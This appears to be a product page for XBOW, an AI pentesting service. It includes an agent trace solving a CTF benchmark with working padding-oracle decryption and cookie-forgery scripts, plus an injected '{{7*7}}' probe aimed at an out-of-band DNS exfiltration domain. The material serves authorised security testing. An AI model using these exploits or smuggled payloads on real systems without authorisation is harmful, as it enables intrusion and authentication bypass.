Skip to main content

XBOW extends your team with autonomous hackers that discover, chain, and exploit vulnerabilities across your attack surface, and prove every finding with a working exploit. No scheduling. No waiting for the next pentest window. Point it at a target and it goes.
Get a Demo

Point it at a URL. Read the exploit it sends back.

XBOW runs the entire pentest autonomously and continuously, from the context you give it to a confirmed, working exploit, every time your applications change.

1

Learn.

You point XBOW at a target and hand it whatever context you have: docs, credentials, API specs, architecture notes. The more you give it, the deeper it goes.

2

Map.

XBOW builds a live map of your attack surface: applications, endpoints, parameters, auth flows.

3

Coordinate.

A coordinator decides what to test, where, and in what order, then directs the effort across the fleet.

4

Attack.

Thousands of agents attack in parallel. They reason through and chain vulnerabilities with an extensive offensive toolkit to reach the non-obvious paths scanners never find. This is exploitation, not pattern-matching.

5

Prove.

Independent validators confirm exploitability, eliminating false positives that can result from AI hallucinations.

Point it at a URL. Read the exploit it sends back.

XBOW runs the entire pentest autonomously and continuously, from the context you give it to a confirmed, working exploit, every time your applications change.

1

Learn.

You point XBOW at a target and hand it whatever context you have: docs, credentials, API specs, architecture notes. The more you give it, the deeper it goes.

2

Map.

XBOW builds a live map of your attack surface: applications, endpoints, parameters, auth flows.

3

Coordinate.

A coordinator decides what to test, where, and in what order, then directs the effort across the fleet.

4

Attack.

Thousands of agents attack in parallel. They reason through and chain vulnerabilities with an extensive offensive toolkit to reach the non-obvious paths scanners never find. This is exploitation, not pattern-matching.

5

Prove.

Independent validators confirm exploitability, eliminating false positives that can result from AI hallucinations.

An extension of your offensive org, built out of agents.

Orchestrated Exploration.

Coordinator provides ongoing orchestration and a decision engine. It debriefs agents and prioritizes.

Focused Execution.

Autonomous agents are short-lived, focused attack workers, retired after each mission to avoid bias.

Real-World Attacks.

An extensive offensive toolkit: industry-standard and custom tools, a steerable headless browser.

Independent Proof.

Validators verify that the exploits are reproducible, minimizing false positives.

Actionable Results.

Verified findings, clear evidence, developer-ready remediation, and reporting your board and auditors accept.

Open a finding. Read exactly how it got in.

Every finding is a complete, reproducible trace: the chained attack path, the working exploit, and a full log of every decision and tactic the agents took. Nothing is hidden behind a severity score. You see the whole kill chain.

Trace Details

Based on the CTF description, we're dealing with a web application that involves a captcha and potentially a padding oracle vulnerability. The mention of "create a user" suggests there's likely a user registration or account creation process. Given this information, our first step should be to explore the web application and understand its structure and functionality.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/3.bash

$ curl -i http://web:8000/

Given our findings about the captcha cookie and the challenge hint about a padding oracle vulnerability, our next step should be to attempt a padding oracle attack. We'll start by creating a Python script that can manipulate the captcha cookie and send requests to the server. This will allow us to test for and potentially exploit the padding oracle vulnerability.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/12.python

import requests
import base64
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES

def oracle(ciphertext):
    cookie = base64.b64encode(ciphertext).decode()
    response = requests.post(
        'http://web:8000/',
        cookies={'captcha': cookie},
        data={'csrf_token': 'dummy', 'username': 'test', 'captcha': '12345'}
    )
    return 'Invalid CAPTCHA!' not in response.text

def decrypt_block(iv, ciphertext):
    plaintext = bytearray(16)
    for i in range(15, -1, -1):
        for b in range(256):
            test_iv = bytearray(iv)
            for j in range(i + 1, 16):
                test_iv[j] ^= plaintext[j] ^ (16 - i)
            test_iv[i] = b
            if oracle(bytes(test_iv) + ciphertext):
                plaintext[i] = b ^ iv[i] ^ (16 - i)
                break
    return bytes(plaintext)

original_ciphertext = base64.b64decode("N6Y/7JROLbkAFB2oEjiqqpFL29cqLmvEAjVchSGU9MQ=")
iv, ciphertext = original_ciphertext[:16], original_ciphertext[16:]

decrypted = decrypt_block(iv, ciphertext)
print("Decrypted:", decrypted)
try:
    unpadded = unpad(decrypted, AES.block_size)
    print("Unpadded:", unpadded)
except ValueError:
    print("Failed to unpad - likely incorrect decryption")

Given that we've successfully decrypted the captcha cookie using the padding oracle attack, but haven't been able to bypass the CAPTCHA validation yet, our next step should be to attempt to forge a valid captcha cookie. We'll try to encrypt our own data using the information we've gathered from the decryption process. This might allow us to create a captcha cookie that the server will accept, effectively bypassing the CAPTCHA challenge.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/24.python

import requests
import base64
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES

def oracle(ciphertext):
    cookie = base64.b64encode(ciphertext).decode()
    response = requests.post(
        'http://web:8000/',
        cookies={'captcha': cookie},
        data={'csrf_token': 'dummy', 'username': 'test', 'captcha': '12345'}
    )
    return 'Invalid CAPTCHA!' not in response.text

def encrypt_block(iv, plaintext):
    ciphertext = bytearray(16)
    for i in range(16):
        for b in range(256):
            test_iv = bytearray(iv)
            for j in range(i):
                test_iv[j] ^= ciphertext[j] ^ plaintext[j]
            test_iv[i] = b ^ plaintext[i]
            if oracle(bytes(test_iv) + bytes(ciphertext)):
                ciphertext[i] = b
                print(f"Found byte at position {i}: {hex(b)}")
                break
        else:
            print(f"Failed to find byte at position {i}")
    return bytes(ciphertext)

# Try to encrypt a simple plaintext
iv = b'0' * 16
plaintext = pad(b"valid_captcha", AES.block_size)

print("Starting encryption...")
encrypted = encrypt_block(iv, plaintext[:16])
if len(plaintext) > 16:
    encrypted += encrypt_block(encrypted, plaintext[16:])

forged_cookie = base64.b64encode(iv + encrypted).decode()
print("Forged captcha cookie:", forged_cookie)

# Test the forged cookie
response = requests.post(
    'http://web:8000/',
    cookies={'captcha': forged_cookie},
    data={'csrf_token': 'dummy', 'username': 'test_user', 'captcha': '12345'}
)
print("Server response:", response.text)
print("Status code:", response.status_code)

Our previous attempts have consistently resulted in a 500 Internal Server Error, indicating that we've successfully bypassed the CAPTCHA validation but are encountering an unexpected error in the application logic. Since modifying the request parameters didn't resolve the issue, we should focus on understanding what's happening on the server side. A common technique in CTF challenges is to use out-of-band communication to extract information. We can try to trigger a DNS lookup or HTTP request from the server to our controlled domain, which might reveal more about the internal error or the application's behavior.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/54.python

import requests
import base64

def send_request(cookie, username):
    response = requests.post(
        'http://web:8000/',
        cookies={'captcha': cookie},
        data={
            'csrf_token': 'dummy',
            'username': f'{username}{{7*7}}.cq6hc92dlrjc77eks1lghsn9pazzqtsr7.xfil.xbow.ltd',
            'captcha': '12345'
        },
        allow_redirects=False
    )
    return response.status_code, response.text

modified_cookie = "N6Y/7JROLbkAFB2oEjgAqZFL29cqLmvEAjVchSGU9MQ="

print("Attempting to trigger a DNS lookup:")
status, text = send_request(modified_cookie, "test_user")
print(f"Status: {status}")
print(f"Response: {text[:200]}...")

print("\nAttempting to trigger a DNS lookup with a different username:")
status, text = send_request(modified_cookie, "hacked_user")
print(f"Status: {status}")
print(f"Response: {text[:200]}...")

Our previous attempts at bit flipping the IV have consistently resulted in "Invalid padding" errors, suggesting that we need a more precise approach to maintain valid padding while modifying the plaintext. Given that the challenge description mentions "Padding Oracle FTW", we should focus on implementing a full padding oracle attack to decrypt and then re-encrypt the captcha cookie with our desired plaintext.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/78.python

import requests
import base64
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES

def oracle(ciphertext):
    cookie = base64.b64encode(ciphertext).decode()
    response = requests.post(
        'http://web:8000/',
        cookies={'captcha': cookie},
        data={'csrf_token': 'dummy', 'username': 'test_user', 'captcha': '12345'}
    )
    return 'Invalid padding' not in response.text

def decrypt_block(iv, ciphertext):
    plaintext = bytearray(16)
    for i in range(15, -1, -1):
        for b in range(256):
            test_iv = bytearray(iv)
            for j in range(i + 1, 16):
                test_iv[j] ^= plaintext[j] ^ (16 - i)
            test_iv[i] = b
            if oracle(bytes(test_iv) + ciphertext):
                plaintext[i] = b ^ iv[i] ^ (16 - i)
                break
    return bytes(plaintext)

def encrypt_block(iv, plaintext):
    ciphertext = bytearray(16)
    for i in range(16):
        for b in range(256):
            test_iv = bytearray(iv)
            for j in range(i):
                test_iv[j] ^= ciphertext[j] ^ plaintext[j]
            test_iv[i] = b
            if oracle(bytes(test_iv) + bytes(ciphertext)):
                ciphertext[i] = b ^ plaintext[i]
                break
    return bytes(ciphertext)

original_cookie = "N6Y/7JROLbkAFB2oEjiqqpFL29cqLmvEAjVchSGU9MQ="
original_ciphertext = base64.b64decode(original_cookie)
iv, block = original_ciphertext[:16], original_ciphertext[16:]

print("Decrypting original captcha...")
decrypted = decrypt_block(iv, block)
print(f"Decrypted (hex): {decrypted.hex()}")
try:
    unpadded = unpad(decrypted, AES.block_size)
    print(f"Unpadded: {unpadded}")
except ValueError:
    print("Failed to unpad - likely incorrect decryption")

target_plaintexts = [b"valid", b"solved", b"captcha_ok", b"approved"]

for target in target_plaintexts:
    print(f"\nTrying to encrypt: {target}")
    padded_target = pad(target, AES.block_size)
    new_iv = bytes([0] * 16)  # Use a new IV filled with zeros
    new_block = encrypt_block(new_iv, padded_target)
    new_cookie = base64.b64encode(new_iv + new_block).decode()
    print(f"New cookie: {new_cookie}")

    # Try to create a user with the new cookie
    create_response = requests.post(
        'http://web:8000/',
        cookies={'captcha': new_cookie},
        data={'csrf_token': 'dummy', 'username': f'hacked_{target.decode()}', 'captcha': '12345'}
    )
    print(f"User creation attempt - Status: {create_response.status_code}")
    print(f"User creation attempt - Response: {create_response.text[:200]}...")

print("\nPadding oracle attack completed. Check the output for successful or interesting responses.")

Given our current knowledge and the challenge description, we've exhausted direct manipulation of the captcha cookie without success. The hint "Captcha is impossible to read in full" suggests that we might not need to fully solve or bypass the CAPTCHA. Instead, we should focus on understanding how the application processes and validates the user input, particularly the relationship between the captcha cookie and the user-submitted captcha value. We need to explore the application's behavior with various combinations of captcha cookie values and user inputs.

$ cat trace/breaking-a-cryptographic-captcha-with-a-cbc-padding-oracle/90.python

import requests
import string
import random

def send_request(captcha_value, username='test_user'):
    response = requests.post(
        'http://web:8000/',
        cookies={'captcha': 'N6Y/7JROLbkAFB2oEjiqqpFL29cqLmvEAjVchSGU9MQ='},  # Use original cookie
        data={'csrf_token': 'dummy', 'username': username, 'captcha': captcha_value},
        allow_redirects=False
    )
    return response.status_code, response.text

print("Testing various captcha inputs:")

# Test specific values
specific_values = ['', '12345', 'valid', 'solved', 'captcha_ok', 'approved']
for value in specific_values:
    status, text = send_request(value)
    print(f"\nCaptcha value: '{value}'")
    print(f"Status: {status}")
    print(f"Response: {text[:200]}...")

# Test random strings
for i in range(5):
    random_value = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
    status, text = send_request(random_value)
    print(f"\nRandom captcha value: '{random_value}'")
    print(f"Status: {status}")
    print(f"Response: {text[:200]}...")

# Test very long input
long_value = 'A' * 1000
status, text = send_request(long_value)
print(f"\nLong captcha value (1000 'A's)")
print(f"Status: {status}")
print(f"Response: {text[:200]}...")

# Test special characters
special_chars = '!@#$%^&*()_+-=[]{}|;:,.<>?'
status, text = send_request(special_chars)
print(f"\nSpecial characters captcha value: '{special_chars}'")
print(f"Status: {status}")
print(f"Response: {text[:200]}...")

print("\nTesting completed. Check the output for interesting responses.")

Breaking a Cryptographic CAPTCHA With a CBC Padding Oracle

Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.

Put XBOW in your pipeline.

Your applications and attack surface change every day. The XBOW API launches pentests programmatically and at scale, across everything you ship, so you find and prove the flaws attackers would actually exploit, on your own release cadence.

Explore the API
Read the API reference

Frontier models find vulnerabilities. A platform proves them.

Frontier models are remarkable at finding possible vulnerabilities. But a model is not a pentesting platform. Proving exploitability, staying safe in production, systematically covering the attack surface, orchestrating agents at scale, controlling cost, routing across models, fitting your workflows, and earning trust: that is the platform, and the hard part to build and maintain. XBOW gives you frontier-model power with enterprise control, without owning the burden.

Proof, not a flood of maybes.

The harness validates every finding with a working exploit, so the model's output becomes proven risk, not more triage.

Safe and governed by design.

Non-destructive execution, audit trails, and review before findings surface.

Orchestration at scale.

Coordinate agents across your whole portfolio without duplicated work or lost coverage.

When frontier models improve, so do you.

XBOW routes each task to the best model and adopts new frontier models as they ship. No lock-in, no migration project, and every advance in AI capability immediately makes your testing stronger.

Built for Production

Scope You Control.

You define what XBOW can test; XBOW operates within the scope you set.

Safe Validation.

XBOW proves exploitability with production-safe challenges designed to avoid modifying data or disrupting systems.

Observable and Auditable.

Every action the agents take is logged and reviewable, so your team keeps full visibility into how each finding was reached.

Board- and Auditor-ready Reporting.

Results come as reporting your board and auditors accept: clear evidence, severity, and remediation.

Deployment and Compliance Controls.

Deployment aligned to your data separation, residency, and compliance requirements (SOC 2, ISO 27001, PCI DSS, NIS 2).

Can XBOW Hack your app?

Get a Demo